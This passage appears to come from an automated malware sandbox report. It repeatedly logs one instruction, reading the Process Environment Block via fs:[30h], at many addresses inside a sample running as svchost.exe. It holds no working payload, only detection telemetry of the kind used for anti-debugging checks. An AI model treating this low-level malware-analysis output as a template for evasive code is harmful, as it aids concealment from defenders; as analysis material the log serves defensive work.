                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]2_2_032347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]2_2_032347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323C7C0 mov eax, dword ptr fs:[00000030h]2_2_0323C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B07C3 mov eax, dword ptr fs:[00000030h]2_2_032B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E627 mov eax, dword ptr fs:[00000030h]2_2_0324E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03266620 mov eax, dword ptr fs:[00000030h]2_2_03266620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268620 mov eax, dword ptr fs:[00000030h]2_2_03268620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323262C mov eax, dword ptr fs:[00000030h]2_2_0323262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE609 mov eax, dword ptr fs:[00000030h]2_2_032AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272619 mov eax, dword ptr fs:[00000030h]2_2_03272619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03262674 mov eax, dword ptr fs:[00000030h]2_2_03262674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324C640 mov eax, dword ptr fs:[00000030h]2_2_0324C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C6A6 mov eax, dword ptr fs:[00000030h]2_2_0326C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032666B0 mov eax, dword ptr fs:[00000030h]2_2_032666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]2_2_032B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]2_2_032B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0326A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A6C7 mov eax, dword ptr fs:[00000030h]2_2_0326A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6500 mov eax, dword ptr fs:[00000030h]2_2_032C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]2_2_03238550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]2_2_03238550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]2_2_032545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]2_2_032545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232582 mov eax, dword ptr fs:[00000030h]2_2_03232582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232582 mov ecx, dword ptr fs:[00000030h]2_2_03232582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264588 mov eax, dword ptr fs:[00000030h]2_2_03264588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E59C mov eax, dword ptr fs:[00000030h]2_2_0326E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032325E0 mov eax, dword ptr fs:[00000030h]2_2_032325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]2_2_0326C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]2_2_0326C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]2_2_0326E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]2_2_0326E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032365D0 mov eax, dword ptr fs:[00000030h]2_2_032365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]2_2_0326A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]2_2_0326A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C427 mov eax, dword ptr fs:[00000030h]2_2_0322C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A430 mov eax, dword ptr fs:[00000030h]2_2_0326A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC460 mov ecx, dword ptr fs:[00000030h]2_2_032BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA456 mov eax, dword ptr fs:[00000030h]2_2_032EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322645D mov eax, dword ptr fs:[00000030h]2_2_0322645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325245A mov eax, dword ptr fs:[00000030h]2_2_0325245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032364AB mov eax, dword ptr fs:[00000030h]2_2_032364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032644B0 mov ecx, dword ptr fs:[00000030h]2_2_032644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BA4B0 mov eax, dword ptr fs:[00000030h]2_2_032BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA49A mov eax, dword ptr fs:[00000030h]2_2_032EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032304E5 mov ecx, dword ptr fs:[00000030h]2_2_032304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]2_2_0325EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]2_2_0325EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]2_2_032F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]2_2_032F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304B00 mov eax, dword ptr fs:[00000030h]2_2_03304B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322CB7E mov eax, dword ptr fs:[00000030h]2_2_0322CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]2_2_032E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]2_2_032E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]2_2_03302B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]2_2_03302B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]2_2_03302B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]2_2_03302B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]2_2_032C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]2_2_032C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FAB40 mov eax, dword ptr fs:[00000030h]2_2_032FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D8B42 mov eax, dword ptr fs:[00000030h]2_2_032D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228B50 mov eax, dword ptr fs:[00000030h]2_2_03228B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEB50 mov eax, dword ptr fs:[00000030h]2_2_032DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]2_2_03240BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]2_2_03240BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]2_2_032E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]2_2_032E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EBFC mov eax, dword ptr fs:[00000030h]2_2_0325EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BCBF0 mov eax, dword ptr fs:[00000030h]2_2_032BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEBD0 mov eax, dword ptr fs:[00000030h]2_2_032DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA24 mov eax, dword ptr fs:[00000030h]2_2_0326CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EA2E mov eax, dword ptr fs:[00000030h]2_2_0325EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA38 mov eax, dword ptr fs:[00000030h]2_2_0326CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BCA11 mov eax, dword ptr fs:[00000030h]2_2_032BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEA60 mov eax, dword ptr fs:[00000030h]2_2_032DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]2_2_032ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]2_2_032ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]2_2_03240A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]2_2_03240A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]2_2_03238AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]2_2_03238AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286AA4 mov eax, dword ptr fs:[00000030h]2_2_03286AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304A80 mov eax, dword ptr fs:[00000030h]2_2_03304A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268A90 mov edx, dword ptr fs:[00000030h]2_2_03268A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]2_2_0326AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]2_2_0326AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230AD0 mov eax, dword ptr fs:[00000030h]2_2_03230AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]2_2_03264AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]2_2_03264AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B892A mov eax, dword ptr fs:[00000030h]2_2_032B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C892B mov eax, dword ptr fs:[00000030h]2_2_032C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]2_2_032AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]2_2_032AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC912 mov eax, dword ptr fs:[00000030h]2_2_032BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]2_2_03228918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]2_2_03228918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]2_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov edx, dword ptr fs:[00000030h]2_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]2_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]2_2_032D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]2_2_032D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC97C mov eax, dword ptr fs:[00000030h]2_2_032BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0946 mov eax, dword ptr fs:[00000030h]2_2_032B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304940 mov eax, dword ptr fs:[00000030h]2_2_03304940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
